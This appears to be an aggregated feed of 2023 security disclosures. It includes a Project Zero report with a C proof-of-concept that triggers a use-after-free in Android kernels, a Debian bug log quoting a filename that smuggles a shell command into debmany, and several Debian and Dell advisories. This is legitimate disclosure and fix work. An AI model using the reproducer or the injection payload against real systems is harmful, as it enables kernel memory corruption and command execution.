Android GKI kernels contain broken non-upstream Speculative Page Faults MM code that can lead to multiple use-after-free conditions.

    Android: GKI kernels contain broken non-upstream Speculative Page Faults MM codeA central recurring theme in Linux MM development is that contention on themmap lock can have a big negative performance impact on multithreaded workloads:If one thread is holding the mmap lock in exclusive mode for an extended amountof time, other threads will block as soon as they try to handle a page fault.Therefore there is a bunch of work to downgrade exclusive lock holders tonon-exclusive lock holders, shrink critical sections, and avoid holding the lockaltogether in some cases.One proposal to avoid holding the mmap lock in page fault handling are\"Speculative page faults (SPF)\"; here's a patch series from 2019 that had alreadygone through 11 rounds of review:<https://lore.kernel.org/lkml/20190416134522.17540-1-ldufour@linux.ibm.com/t/>This patch series didn't land at the time; but something along those lines mightland upstream in the next few years.But for some reason, Android decided that they need speculative page faultsimmediately, and merged the patches that were discussed on the upstream mailinglist into their GKI kernels. This is problematic for two reasons:A) The MM code is complicated and easy to get wrong.   If you run MM code that has not been through the fuzzing, testing and review   that committed upstream code gets, there's a higher chance of undiscovered   bugs.B) The SPF patches **change the rules** that MM code has to follow, so now   Android's version of MM has different rules than upstream MM.   This means that any patches in vaguely related parts of upstream MM need to   be checked by an Android engineer to see if they conflict with Android's   special rules.As far as I can tell, there are a bunch of memory safety bugs in the SPF versionthat is currently in AOSP's android13-5.10 branch (at commit 232bdcbd660b):1. handle_pte_fault() calls pmd_none() without protection against concurrent   page table deletion, leading to UAF read.2. do_anonymous_page() calls pte_alloc() without protection against concurrent   page table deletion, leading to UAF write.3. do_anonymous_page() calls pmd_trans_unstable() without protection against   concurrent page table deletion, leading to UAF read.4. do_swap_page() -> migration_entry_wait() -> __migration_entry_wait() operates   on a page table without protection against concurrent page table deletion,   leading to use-after-union-change read+write in struct page (on the page   table lock) and use-after-free read of a page table entry (resulting in bogus   page* calculation)5. do_wp_page() calls handle_userfault() without protection against concurrent   userfaultfd_release(), leading to UAF reads of some flags from   userfaultfd_ctx.   I think back when the SPF series was posted upstream, there might have been   sufficient protection against this (because ___handle_speculative_fault()   bails on VMAs with VM_UFFD_MISSING), but since then the WP userfaultfd   support was added, and ___handle_speculative_fault() doesn't bail on   VM_UFFD_WP. do_wp_page() also doesn't check the cached VMA flags, it uses   userfaultfd_pte_wp() which reads flags from the VMA.6. The way seqcounts are used to detect concurrent writers looks wrong.   The seqcount API requires that only one writer at a time can be in a   vm_write_begin() / vm_write_end() section, but these helpers are used in   codepaths that only hold the mmap lock in shared mode, so there can be   concurrent writers.   As far as I can tell, this means that when there are an even number of   concurrent writers, it will look as if there are no active writers.   This _probably_ doesn't have much security impact because all of the places   that do vm_write_begin() where concurrency would be an actual problem seem to   hold the mmap lock in exclusive mode?As an example, I tested issue 2. To reproduce this easily, I patched an extradelay into the kernel:```diff --git a/mm/memory.c b/mm/memory.cindex 83b715ed65775..35ce412d0a965 100644--- a/mm/memory.c+++ b/mm/memory.c@@ -84,6 +84,8 @@ #include <asm/tlb.h> #include <asm/tlbflush.h> +#include <linux/delay.h>+ #include \"pgalloc-track.h\" #include \"internal.h\" @@ -3819,6 +3821,12 @@ static vm_fault_t do_anonymous_page(struct vm_fault *vmf)        vm_fault_t ret = 0;        pte_t entry; +       if (strcmp(current->comm, \"SLOWME\") == 0 && (vmf->flags & FAULT_FLAG_SPECULATIVE)) {+               pr_warn(\"%s: BEGIN DELAY 0x%lx\\", __func__, vmf->address);+               mdelay(2000);+               pr_warn(\"%s: END DELAY 0x%lx\\", __func__, vmf->address);+       }+        /* File mapping without ->vm_ops ? */        if (vmf->vma_flags & VM_SHARED)                return VM_FAULT_SIGBUS;```Then, I ran this testcase on an x86 build with ASAN and CONFIG_PREEMPT:```#define _GNU_SOURCE#include <pthread.h>#include <err.h>#include <unistd.h>#include <sys/prctl.h>#include <sys/mman.h>// basic idea:// delete the 1G-covering page table while do_anonymous_page() is at its entry// point#define VMA_ADDR ((void*)0x40000000UL)#define VMA_SIZE (0x40000000UL)#define SYSCHK(x) ({          \\  typeof(x) __res = (x);      \\  if (__res == (typeof(x))-1) \\    err(1, \"SYSCHK(\" #x \")\"); \\  __res;                      \\})static void *thread_fn(void *dummy) {  SYSCHK(prctl(PR_SET_NAME, \"SLOWME\"));  *(volatile char *)VMA_ADDR;  SYSCHK(prctl(PR_SET_NAME, \"spfthread\"));}int main(void) {  SYSCHK(mmap(VMA_ADDR, VMA_SIZE, PROT_READ|PROT_WRITE,                        MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0));  SYSCHK(madvise(VMA_ADDR, VMA_SIZE, MADV_NOHUGEPAGE));  // create anon_vma and page tables  *(volatile char *)(VMA_ADDR+0x1000) = 1;  pthread_t thread;  if (pthread_create(&thread, NULL, thread_fn, NULL))    errx(1, \"pthread_create\");  sleep(1);  munmap(VMA_ADDR, VMA_SIZE);  if (pthread_join(thread, NULL))    errx(1, \"pthread_join\");  return 0;}```This first results in a UAF read of a PTE:```do_anonymous_page: BEGIN DELAY 0x40000000do_anonymous_page: END DELAY 0x40000000==================================================================BUG: KASAN: use-after-free in handle_pte_fault (./arch/x86/include/asm/pgtable_types.h:394 ./arch/x86/include/asm/pgtable.h:823 mm/memory.c:3844 mm/memory.c:4687) Read of size 8 at addr ffff88800f358000 by task SLOWME/724CPU: 12 PID: 724 Comm: SLOWME Not tainted 5.10.107-00033-g232bdcbd660b-dirty #215Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014Call Trace:dump_stack_lvl (lib/dump_stack.c:120) [...]print_address_description.constprop.0 (mm/kasan/report.c:257) [...][...]kasan_report.cold (mm/kasan/report.c:444 mm/kasan/report.c:460) [...]handle_pte_fault (./arch/x86/include/asm/pgtable_types.h:394 ./arch/x86/include/asm/pgtable.h:823 mm/memory.c:3844 mm/memory.c:4687) [...]___handle_speculative_fault (./include/linux/memcontrol.h:686 mm/memory.c:5106) [...]__handle_speculative_fault (mm/memory.c:5148) [...]do_user_addr_fault (arch/x86/mm/fault.c:1320) [...]exc_page_fault (./arch/x86/include/asm/irqflags.h:157 arch/x86/mm/fault.c:1470 arch/x86/mm/fault.c:1518) [...]asm_exc_page_fault (./arch/x86/include/asm/idtentry.h:571) RIP: 0033:0x55d52bfe41fb```Then pte_alloc() tries to lock the page table entry:```BUG: KASAN: use-after-free in do_raw_spin_lock (kernel/locking/spinlock_debug.c:83 kernel/locking/spinlock_debug.c:112) Read of size 4 at addr ffff88801a730004 by task SLOWME/724```and after that, it will write into the freed page table.From a security perspective, my recommendation is to fix this by reverting thespeculative page fault patches out of the GKI trees, since I believe that sucha divergence from upstream semantics is not maintainable. Looking through thecommit history of the AOSP android13-5.10 kernel branch also shows that a seriesof bugs have already been discovered that were introduced by SPF:81a1ae6b4395a ANDROID: mm: unlock the page on speculative fault retry88e4dbaf592d8 ANDROID: Make MGLRU aware of speculative faults320ffbea77113 ANDROID: mm: Fix page table lookup in speculative fault path729a79f366e5e ANDROID: fix mmu_notifier race caused by not taking mmap_lock during SPFc3cbea92297d5 ANDROID: mm: avoid writing to read-only elementsdd3f538bf715c ANDROID: x86/mm: fix vm_area_struct leak in speculative pagefault handlingcf397c6c269ac ANDROID: mm: sync rss in speculative page fault path531f65ae67382 ANDROID: mm: Fix sleeping while atomic during speculative page faultThis bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2023-02-01.Please note that, according to our disclosure policy, if Project Zero discoversa variant of a previously reported Project Zero bug, technical details of thevariant will be added to the existing Project Zero report (which may be alreadypublic) and the report will not receive a new deadline.Project Zero will consider new race conditions where the SPF fault path accessespage tables or the VMA without sufficient locking variants of this issue.This includes issues that are introduced after this bug is reported.For more details, seehttps://googleprojectzero.blogspot.com/2021/04/policy-and-disclosure-2021-edition.html.Related CVE Number: CVE-2023-20937.Found by: jannh@google.com

Android GKI Kernels Contain Broken Non-Upstream Speculative Page Faults MM Code

debmany in debian-goodies 0.88.1 allows attackers to execute arbitrary shell commands (because of an eval call) via a crafted .deb file. (The path is shown to the user before execution.)

**Debian Bug report logs - #1031267  
debmany: shell injection**

Reported by: Jakub Wilk <jwilk@jwilk.net>

Date: Tue, 14 Feb 2023 09:57:01 UTC

Severity: normal

Tags: confirmed, patch, pending, security

Found in version debian-goodies/0.88.1

Reply or subscribe to this bug.

Toggle useless messages

**Report forwarded** to debian-bugs-dist@lists.debian.org, jwilk@jwilk.net, Javier Fernández-Sanguino Peña <jfs@debian.org>:  
Bug#1031267; Package debian-goodies. (Tue, 14 Feb 2023 09:57:03 GMT) (full text, mbox, link).

Message #3 received at submit@bugs.debian.org (full text, mbox, reply):

\[Message part 1 (text/plain, inline)\]

Package: debian-goodies
Version: 0.88.1
Tags: security

debmany passes filenames from the .deb (which should be considered 
untrusted input) to eval.

I've attached proof-of-concept exploit.

-- 
Jakub Wilk

\[injection.deb (application/vnd.debian.binary-package, attachment)\]

**Information forwarded** to debian-bugs-dist@lists.debian.org, Javier Fernández-Sanguino Peña <jfs@debian.org>:  
Bug#1031267; Package debian-goodies. (Tue, 14 Feb 2023 10:06:07 GMT) (full text, mbox, link).

Message #6 received at 1031267@bugs.debian.org (full text, mbox, reply):

\* Jakub Wilk <jwilk@jwilk.net>, 2023-02-14 10:53:
>attached proof-of-concept exploit.

The code that generated the crafted .deb is here:
https://github.com/jwilk/crafted.deb/blob/master/gen-deb1031267-debmany

-- 
Jakub Wilk

**Information forwarded** to debian-bugs-dist@lists.debian.org, Javier Fernández-Sanguino Peña <jfs@debian.org>:  
Bug#1031267; Package debian-goodies. (Tue, 14 Feb 2023 14:57:02 GMT) (full text, mbox, link).

**Acknowledgement sent** to Axel Beckert <abe@debian.org>:  
Extra info received and forwarded to list. Copy sent to Javier Fernández-Sanguino Peña <jfs@debian.org>. (Tue, 14 Feb 2023 14:57:03 GMT) (full text, mbox, link).

Message #11 received at 1031267@bugs.debian.org (full text, mbox, reply):

\[Message part 1 (text/plain, inline)\]

Control: tag -1 + confirmed

Hi Jakub,

thanks for the bug report.

Jakub Wilk wrote:
> debmany passes filenames from the .deb (which should be considered untrusted
> input) to eval.
>
> I've attached proof-of-concept exploit.

Thanks. Can reproduce it.

Given that the full path including the exploit code is always shown to
the user before the exploit actually runs, I consider the impact
rather low:

┌────────────────────────┤ Select a file (file:./injection.deb) ├────────────────────────┐
│                                                                                        │
│  usr/share/doc/$(cowsay${IFS}pwned>/dev/tty;sleep${IFS}inf)/changelog.gz changelog.gz  │
│                                                                                        │
│                      <Ok>                                 <Cancel>                     │
│                                                                                        │
└────────────────────────────────────────────────────────────────────────────────────────┘

Accordingly a severity of only "normal" seems fitting.

Should be fixed nevertheless. Will look into it.

		Regards, Axel
-- 
 ,''\`.  |  Axel Beckert <abe@debian.org>, https://people.debian.org/~abe/
: :' :  |  Debian Developer, ftp.ch.debian.org Admin
\`. \`'   |  4096R: 2517 B724 C5F6 CA99 5329  6E61 2FF9 CD59 6126 16B5
  \`-    |  1024D: F067 EA27 26B9 C3FC 1486  202E C09E 1D89 9593 0EDE

\[signature.asc (application/pgp-signature, inline)\]

**Added tag(s) confirmed.** Request was from Axel Beckert <abe@debian.org> to 1031267-submit@bugs.debian.org. (Tue, 14 Feb 2023 14:57:03 GMT) (full text, mbox, link).

**Information forwarded** to debian-bugs-dist@lists.debian.org, Javier Fernández-Sanguino Peña <jfs@debian.org>:  
Bug#1031267; Package debian-goodies. (Sun, 19 Feb 2023 04:51:03 GMT) (full text, mbox, link).

**Acknowledgement sent** to Axel Beckert <abe@debian.org>:  
Extra info received and forwarded to list. Copy sent to Javier Fernández-Sanguino Peña <jfs@debian.org>. (Sun, 19 Feb 2023 04:51:03 GMT) (full text, mbox, link).

Message #18 received at 1031267@bugs.debian.org (full text, mbox, reply):

Control: tag -1 + patch pending

Hi Jakub,

found time to analyse this closer.

Axel Beckert wrote:
> Given that the full path including the exploit code is always shown to
> the user before the exploit actually runs, I consider the impact
> rather low:
> 
> ┌────────────────────────┤ Select a file (file:./injection.deb) ├────────────────────────┐
> │                                                                                        │
> │  usr/share/doc/$(cowsay${IFS}pwned>/dev/tty;sleep${IFS}inf)/changelog.gz changelog.gz  │
> │                                                                                        │
> │                      <Ok>                                 <Cancel>                     │
> │                                                                                        │
> └────────────────────────────────────────────────────────────────────────────────────────┘

And this even though $manpages (which holds a space separated list of
all files to offer) is — on purpose — unquoted when passing to the
selection program.

But the real culprit is the use of eval in lines 415, 422 and 424:

  414       debug "Opening manpage file: "\`printf "$mancmdline" "$PWD/$file"\` # comment
  415       eval $(printf "$mancmdline" "$PWD/$file")
  416       cd - >/dev/null
  417     else
  418       # other file (usr/share/doc)
  419       debug "Opening other file: "\`printf "$othercmdline" "$PWD/$return"\` # comment
  420       if \[\[ "$return" =~ \\.gz$ \]\]
  421       then
  422               eval $(printf "gzip -dc $PWD/$return | $othercmdline")
  423       else
  424               eval $(printf "$othercmdline" "$PWD/$return")
  425       fi

Eval is evil. Once again.

My first thought was to just exclude all files with shell special
characters, especially '$(' and friends. But

  apt-file search -n \\$\\( | fgrep /usr/share/doc/

shows that these are actually used (and fail with debmany due to the
issue reported by Jakub):

  sdlbasic: /usr/share/doc/sdlbasic/english/sections/commands/Maths/hex$().html
  sdlbasic: /usr/share/doc/sdlbasic/english/sections/commands/Strings/chr$().html
  sdlbasic: /usr/share/doc/sdlbasic/english/sections/commands/Strings/insert$().html
  sdlbasic: /usr/share/doc/sdlbasic/english/sections/commands/Strings/lCase$().html
  sdlbasic: /usr/share/doc/sdlbasic/english/sections/commands/Strings/lTrim$().html
  sdlbasic: /usr/share/doc/sdlbasic/english/sections/commands/Strings/left$().html
  sdlbasic: /usr/share/doc/sdlbasic/english/sections/commands/Strings/mid$().html
  sdlbasic: /usr/share/doc/sdlbasic/english/sections/commands/Strings/replace$().html
  sdlbasic: /usr/share/doc/sdlbasic/english/sections/commands/Strings/replaceSubstr$().html
  sdlbasic: /usr/share/doc/sdlbasic/english/sections/commands/Strings/reverse$().html
  sdlbasic: /usr/share/doc/sdlbasic/english/sections/commands/Strings/right$().html
  sdlbasic: /usr/share/doc/sdlbasic/english/sections/commands/Strings/space$().html
  sdlbasic: /usr/share/doc/sdlbasic/english/sections/commands/Strings/str$().html
  sdlbasic: /usr/share/doc/sdlbasic/english/sections/commands/Strings/string$().html
  sdlbasic: /usr/share/doc/sdlbasic/english/sections/commands/Strings/trim$().html
  sdlbasic: /usr/share/doc/sdlbasic/english/sections/commands/Strings/typeOf$().html
  sdlbasic: /usr/share/doc/sdlbasic/english/sections/commands/Strings/uCase$().html

Additionally there are tons of files with just $ or any kind of brackets.

Just quoting them "properly" inside the eval and printf won't help as
you can always escape from there by just ending the according
quotation by adding a closing quote character into your file path.

In case of the ".gz" case in your example, it's easier to fix as you
can simply move "gzip -dc $PWD/$return |" out of the eval/printf.

But in the other cases it's less simple.

So I came up with the following fix which uses command instead of
eval, and bash pattern substitution to replace %s with the file name
instead letting printf inside an $() doing the substitution:

diff --git a/debmany/debmany b/debmany/debmany
index 7eeb68b..dfea6e9 100755
--- a/debmany/debmany
+++ b/debmany/debmany
@@ -96,6 +96,19 @@ Examples: debmany foo.deb  show manpages from a local package file foo.deb
   fi
 }
 
+replace\_percent\_s\_and\_execute() {
+  replacement="$1"
+  shift
+  declare -a cmdarr
+  cmdarr=($@)
+  debug "cmdarr before; ${cmdarr\[@\]}"
+  for i in ${!cmdarr\[@\]}; do
+    cmdarr\[$i\]="${cmdarr\[$i\]/\\%s/$replacement}"
+  done
+  debug "cmdarr after; ${cmdarr\[@\]}"
+  command "${cmdarr\[@\]}"
+}
+
 while \[ $# -gt 0 \]
 do
   case $1 in
@@ -377,6 +390,7 @@ else
   dpkg --fsys-tarfile "$file" | tar --wildcards -xf - $mandirs 2>/dev/null
   # find all manpage files
   manpages=\`find usr -type f 2>/dev/null|sort|sed -e 's|\$\[^/\]\*\$$|\\1 \\1|'\`
+  # | egrep -v '\[\\\`\\\\${}\*?;<>|\]'
 fi
 
 while true
@@ -412,16 +426,16 @@ do
         cd "$path"
       fi
       debug "Opening manpage file: "\`printf "$mancmdline" "$PWD/$file"\` # comment
-      eval $(printf "$mancmdline" "$PWD/$file")
+      replace\_percent\_s\_and\_execute "$PWD/$file" "$mancmdline"
       cd - >/dev/null
     else
       # other file (usr/share/doc)
       debug "Opening other file: "\`printf "$othercmdline" "$PWD/$return"\` # comment
       if \[\[ "$return" =~ \\.gz$ \]\]
       then
-              eval $(printf "gzip -dc $PWD/$return | $othercmdline")
+              gzip -dc "$PWD/$return" | replace\_percent\_s\_and\_execute '-' "$othercmdline"
       else
-              eval $(printf "$othercmdline" "$PWD/$return")
+              replace\_percent\_s\_and\_execute "$PWD/$return" "$othercmdline"
       fi
     fi
   else

This is now committed as
https://salsa.debian.org/debian/debian-goodies/-/commit/495eaafa94d2b4cbee4eed01cd78238e311d096b
but I'd be happy about a review before I upload.

I will also do some more testing on my side.

		Regards, Axel
-- 
 ,''\`.  |  Axel Beckert <abe@debian.org>, https://people.debian.org/~abe/
: :' :  |  Debian Developer, ftp.ch.debian.org Admin
\`. \`'   |  4096R: 2517 B724 C5F6 CA99 5329  6E61 2FF9 CD59 6126 16B5
  \`-    |  1024D: F067 EA27 26B9 C3FC 1486  202E C09E 1D89 9593 0EDE

**Added tag(s) patch and pending.** Request was from Axel Beckert <abe@debian.org> to 1031267-submit@bugs.debian.org. (Sun, 19 Feb 2023 04:51:03 GMT) (full text, mbox, link).

Send a report that this bug log contains spam.

Debian bug tracking system administrator <owner@bugs.debian.org\>. Last modified: Sun Mar 5 22:36:39 2023; Machine Name: bembo

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.

CVE-2023-27635: #1031267 - debmany: shell injection

Debian Linux Security Advisory 5367-1 - It was discovered that SPIP, a website engine for publishing, would allow a malicious user to execute arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5367-1                   security@debian.orghttps://www.debian.org/security/                       Sebastien DelafondMarch 02, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : spipCVE ID         : CVE-2023-27372It was discovered that SPIP, a website engine for publishing, wouldallow a malicious user to execute arbitrary code.For the stable distribution (bullseye), this problem has been fixed inversion 3.2.11-3+deb11u7.We recommend that you upgrade your spip packages.For the detailed security status of spip please refer toits security tracker page at:https://security-tracker.debian.org/tracker/spipFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmQAP4QACgkQEL6Jg/PVnWSHawgAm8iQlTcFT98cMImGBx8XTO70YPcgzIMK87mvmQn3NR30/dM9icfBVVu3l9Ks2mPa0yYIT0DTeXghTclf8hnJtOM2T4buRPD6po6ZyEgX5AlwN6xaZPAkYxiz+7GXiqYZAHAMShIZhhMr1CcIDsE093TC8dLdZFosSVtI7sylxTgbSlJl1xafhe6/6fhI2DcDr4ov7MrkfcjCT2BY9um/pH/L2lIKTDcHahgoxGf9wcurANtwHwHQsBNR3R5nxScH/1wTI53am6rPCYFuLGlGEcY6c2HyJPR3j3o+sUFYca+4fGNbmwuS8fOhhOgz19DTow374IwJU1qnoZjvrbB58g=ÌjC-----END PGP SIGNATURE-----

Debian Security Advisory 5367-1

Dell NetWorker versions 19.5 and earlier contain 'Apache Tomcat' version disclosure vulnerability. A NetWorker server user with remote access to NetWorker clients may potentially exploit this vulnerability and may launch target-specific attacks.

**Vaikutus**

High

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

  
CVE-2023-25544

Dell NetWorker versions 19.5 and earlier contain 'Apache Tomcat' version disclosure vulnerability. A NetWorker server user with remote access to NetWorker clients may potentially exploit this vulnerability and may launch target-specific attacks.

7.5  
High

 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2023-24567

Dell NetWorker versions 19.5 and earlier contain 'RabbitMQ' version disclosure vulnerability. A NetWorker server user with remote access to NetWorker clients may potentially exploit this vulnerability and may launch target-specific attacks.

7.5  
High

 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

  
CVE-2023-25544

Dell NetWorker versions 19.5 and earlier contain 'Apache Tomcat' version disclosure vulnerability. A NetWorker server user with remote access to NetWorker clients may potentially exploit this vulnerability and may launch target-specific attacks.

7.5  
High

 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2023-24567

Dell NetWorker versions 19.5 and earlier contain 'RabbitMQ' version disclosure vulnerability. A NetWorker server user with remote access to NetWorker clients may potentially exploit this vulnerability and may launch target-specific attacks.

7.5  
High

 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**CVEs Addressed**

**Product**

**Affected Versions**

**Updated Versions**

**Applicable platforms**

**Link to Update**

CVE-2023-25544

Dell NetWorker,  
NVE

19.5 and earlier versions

19.6 and later versions

Windows,  
Linux (CentOS, OEL, SuSE, Red Hat Enterprise Linux, Debian, Ubuntu, Fedora)

https://www.dell.com/support/home/en-ca/product-support/product/networker/drivers  
 

CVE-2023-24567

 

**NOTE:** Impacted components: NetWorker AuthC, NetWorker Server.

**CVEs Addressed**

**Product**

**Affected Versions**

**Updated Versions**

**Applicable platforms**

**Link to Update**

CVE-2023-25544

Dell NetWorker,  
NVE

19.5 and earlier versions

19.6 and later versions

Windows,  
Linux (CentOS, OEL, SuSE, Red Hat Enterprise Linux, Debian, Ubuntu, Fedora)

https://www.dell.com/support/home/en-ca/product-support/product/networker/drivers  
 

CVE-2023-24567

 

**NOTE:** Impacted components: NetWorker AuthC, NetWorker Server.

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2023-03-01

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

NetWorker Family, NetWorker, NetWorker Series, NetWorker Module, Product Security Information

01 maalisk. 2023

CVE-2023-25544: DSA-2023-058: Dell NetWorker Security Update for Version Disclosure Vulnerability

Debian Linux Security Advisory 5366-1 - The Qualys Research Labs reported an authorization bypass (CVE-2022-41974) and a symlink attack (CVE-2022-41973) in multipath-tools, a set of tools to drive the Device Mapper multipathing driver, which may result in local privilege escalation.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5366-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
March 01, 2023                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : multipath-tools  
CVE ID         : CVE-2022-41973 CVE-2022-41974  
Debian Bug     : 1022742

The Qualys Research Labs reported an authorization bypass  
(CVE-2022-41974) and a symlink attack (CVE-2022-41973) in  
multipath-tools, a set of tools to drive the Device Mapper multipathing  
driver, which may result in local privilege escalation.

Please refer to /usr/share/doc/multipath-tools/NEWS.Debian.gz for  
backwards-incompatible changes in this update.

For the stable distribution (bullseye), these problems have been fixed in  
version 0.8.5-2+deb11u1.

We recommend that you upgrade your multipath-tools packages.

For the detailed security status of multipath-tools please refer to its  
security tracker page at:  
https://security-tracker.debian.org/tracker/multipath-tools

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmP/NuFfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0RyiQ//VY70yfm+KRaOehk7p4ek9uc2PY/ezIyGp29CijJBjugxR1+C1NEDahES  
QUv/b1D9UsLDy+lKCRIoQAfpQ7cZd9GlVNJYNBCvSxIVjqNkj8WDkZdVOqNgE+mr  
Orl8w3szGVQtuFplG5q/5Q5kNzcJ9kKNRnuD33+UqpN88h2/HfxBLJzDJNf28HT6  
axpdCh48QYuk8k5M1Ns6ciguMQUG3nG9yFyrHrKkUQZTjqY3bqN+J56JpBqCKUt9  
QWryP3O2DzLEQR+ZY1zdoZw9X517vS8vb7j+22qy4jCNkZeUcaefIinSEOtI7Vto  
usSCcWUSfpyUDAD0VJswG7kftOo6VCVjujpdEDFMuUpFBAuwbbCR5e15Xw1+yIYE  
A6uIKw9bvZWqyTPZ13Yq3wH8qdXXjevH4xkHqWFeokAZ7Y0TrLHOiqnItbKOWX/k  
bhBVl/V47EVPnKleIk4PYIcB/6yFpgK7ujX6z8JMCFLGaEv2E8spJBZUOBsFTc2z  
9GhOi5BGbLKr6rsgGeuCI9ELsbREIDr/I9etWlTr6xjSCln5r66ZyHquarG4pj+K  
OYs8GqLMwBNTcB/ZMngZZO+hGjOhSQGIYIDPwb28dgLFGQo1ADP7TWUtSkqYQ6LT  
m3jiUKLqwYRmwEN9vKrfZo9HTqMTtsNPzxqCoX3/3V/XNYFI8WMÖk/  
-----END PGP SIGNATURE-----

Debian Security Advisory 5366-1

Sudo before 1.9.13p2 has a double free in the per-command chroot feature.

CVE-2023-27320: Stable Release

Debian Linux Security Advisory 5365-1 - Patrick Monnerat discovered that Curl's support for "chained" HTTP compression algorithms was susceptible to denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5365-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
February 27, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : curl  
CVE ID         : CVE-2023-23916

Patrick Monnerat discovered that Curl's support for "chained" HTTP  
compression algorithms was susceptible to denial of service.

For the stable distribution (bullseye), this problem has been fixed in  
version 7.74.0-1.3+deb11u7. This update also fixes a regression in  
the previously released fix for CVE-2022-27774.

We recommend that you upgrade your curl packages.

For the detailed security status of curl please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/curl

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmP9Il4ACgkQEMKTtsN8  
TjZKEA//cK64gwXlsdkBMurkfaS4XVzPfAIPoR3b9Zun57OnO79Hb+Lubj23iva0  
PpnHi5cyLDRC4RkQrICAygGGZkqBg0s5kA2aNv6sNF4CrF01cDHi5xbeb8SIb3K2  
S6n/UOXST1zWlPjPsewoe+ct1dC53+24pelwVWNB8fRdvnbD49XQQ7eI8hZAWJpt  
ebFXkfi7xOPrSgHJdOyHAjJK3qySqfOgfbBY3qy650Po3SHS+YAqztRl+/TQf/Al  
fonzIypIHpcTDUyzJ9qBfLTUbui0HgjiaQbepp42+mUb/ajtbSlVHf+a+MXUm2Vr  
5kE7SDdoXTQDHkdiuo0SFpxOhhGG3BV7RecX+4tKnfTP5ADr2MZ0XnVq5RJ6y9eL  
1JOTxdFBPIIjzIpdCN2NrQdSXEk9faZv6L3HXoUA92rtXaxdqYD0UkNsOBYjBtJT  
4TZOS3br3bsYUxveFGeJsHA0DTcv+k6NtHxE9XyTvPwjPZyAgck35K+4zPZkQxO1  
fHGWXVCODsPm6g/TzPP1GrBzuLGS9fbhAF2+cVQkSPoO8eS7salDkR4k7HCshNuY  
5qhLi5PQCTrlIhOfOueRoBj0dYtR96WePh8K6mQ1gA/KtQ+n/Ps+Obpnv75cdOF8  
K03rqj/CFODZ/IqinIUr+8b+Pt50kTenU4Z6pacqleEz4WcVePc=  
=7ySA  
-----END PGP SIGNATURE-----

Debian Security Advisory 5365-1

Debian Linux Security Advisory 5364-1 - Ronald Crane discovered that missing input saniting in the apr_base64 functions of apr-util, the Apache Portable Runtime utility library, may result in denial of service or potentially the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5364-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoFebruary 26, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : apr-utilCVE ID         : CVE-2022-25147Ronald Crane discovered that missing input saniting in the apr_base64functions of apr-util, the Apache Portable Runtime utility library, mayresult in denial of service or potentially the execution of arbitrarycode.For the stable distribution (bullseye), this problem has been fixed inversion 1.6.1-5+deb11u1.We recommend that you upgrade your apr-util packages.For the detailed security status of apr-util please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/apr-utilFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: 